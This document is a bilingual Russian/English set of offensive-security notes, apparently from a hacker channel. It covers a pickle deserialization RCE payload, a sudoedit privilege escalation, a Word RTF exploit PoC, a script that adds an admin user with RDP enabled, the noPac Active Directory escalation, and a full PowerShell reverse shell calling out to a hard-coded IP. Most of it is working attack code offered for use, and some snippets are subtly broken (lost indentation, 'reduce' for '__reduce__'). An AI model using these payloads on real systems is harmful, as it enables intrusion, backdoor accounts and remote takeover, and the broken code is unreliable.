Python Deserialization via Pickle

# RU

У Python есть несколько методов сериализации объектов: Marshall и Pickle
Модуль Pickle реализует двоичные протоколы для сериализации и десериализации объектов Python. Однако модуль Pickle не является безопасным и лучше распаковывать только те данные, которым вы доверяете.

Для эксплуатации мы будем использовать следующий метод:
pickle.dumps(obj)

Помимо этого есть еще библиотека pickletools

Этот модуль содержит различные методы, относящиеся к внутренним деталям модуля pickle

Здесь нам потребуются два метода:
pickletools.optimize()
pickletools.dis()

Теперь мы можем сделать свой пэйлоад для получения RCE. Кстати чтобы также сериализовался наш пэйлоад, то мы используем reduce в нашем классе


# EN


Python has several methods for serializing objects: Marshall and Pickle
The Pickle module implements binary protocols for serializing and deserializing Python objects. However, the Pickle module is not secure and will only decompress data that you trust.

We will use the following method to exploit it:
pickle.dumps(obj)

Apart from that there is also the pickletools library.

This module contains various methods related to the pickle module's internals

Here we need two methods:
pickletools.optimize()
pickletools.dis()

Now we can make our own payload to get the RCE. By the way, to serialize our payload as well, we use reduce in our class

PAYLOAD

import base64
import pickle
import pickletools
import subprocess
class anti_pickle_serum:
def reduce(self):
command = ['id']
return subprocess.check_output, (command,)
exploit_obj = anti_pickle_serum()
raw_pickle = pickle.dumps({"serum" : exploit_obj}, protocol=0)
optimized_pickle = pickletools.optimize(raw_pickle)
pickletools.dis(optimized_pickle)
payload = base64.b64encode(raw_pickle)
print(payload)


THX:

https://docs.python.org/3/library/pickle.html

https://davidhamann.de/2020/04/05/exploiting-python-pickle/

https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd

Sudoedit Privilege Escalation (CVE-2023-22809)

#RU

Проверьте, что вы можете использовать sudoedit

cat /etc/sudoers

Введя дополнительный дэш, мы можем заставить наш редактор работать от имени root

export EDITOR='vim -- /path/to/your/files'

Теперь вы можете читать/писать файлы с привилегиями root

sudoedit /etc/custom/service.conf

#EN

Check that you can use sudoedit

cat /etc/sudoers

By introducing an extra dash, we can make our editor work as root

export EDITOR='vim -- /path/to/your/files'

Now you can read/write files with root

sudoedit /etc/custom/service.conf

Tools:

https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc

CVE-2023-21716(Microsoft Word RCE vuln) Python PoC

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

Сreate user via bat file extension

#RU

На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.

#EN

I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.

net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)

Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?

1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:

Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota

Чтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте sAMAccountName на конце $. Однако прикол в том, что этот символ не всегда проверяется. Атрибутом имени учетной записи компьютера является sAMAccountName. Этот атрибут можно увидеть и отредактировать вручную с помощью ADSIEdit Tool

2. При запросе билета на обслуживание сначала необходимо предъявить TGT. Если запрашиваемый билет не найден KDC, KDC автоматически выполняет повторный поиск с последующим $. Если TGT получен для username, а пользователь username удален, то используя этот TGT для запроса сервисного билета для другого пользователя через S4U2self приведет к тому, что KDC будет искать username$ в AD.

Объединяя эти вулны, мы имеем примерно такой сценарий

Пользователь запрашивает TGT. Затем пользователь может попытаться удалить или переименовать исходную учетную запись компьютера. Получив TGT, пользователь может начать эксплуатировать sAMAccountName. А полностью зная, что KDC поставляет тикеты и временные сеансовые ключи пользователям и компьютерам в домене, мы это можем использовать для повышения привилегий

Сценарий эксплуатации выглядит так:

1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается Kerberos TGT с использованием обновленного имени учетной записи компьютера.
4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения S4U2self

Звучит душно, благо есть noPac, который эксплуатирует данную проблему

THX:

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

https://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml

https://github.com/WazeHell/sam-the-admin

PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!

usage:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"